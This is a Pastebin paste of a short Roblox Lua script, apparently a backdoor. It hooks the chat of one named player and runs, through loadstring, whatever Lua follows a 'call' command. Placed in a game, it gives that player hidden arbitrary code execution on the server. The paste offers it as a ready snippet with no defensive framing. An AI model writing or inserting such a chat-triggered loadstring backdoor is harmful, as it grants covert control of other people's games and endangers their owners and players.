Advertisement
plytalent

callloadstring pet

Nov 22nd, 2020
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. game:GetService("Players").PetKunggamer.Chatted:Connect(function(message)
  2. if string.sub(message,1,3) == "/e " then
  3. message = string.sub(message,4)
  4. end
  5. if string.sub(message,1,4) == "call" then
  6. loadstring(string.sub(message,6))()
  7. end
  8. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement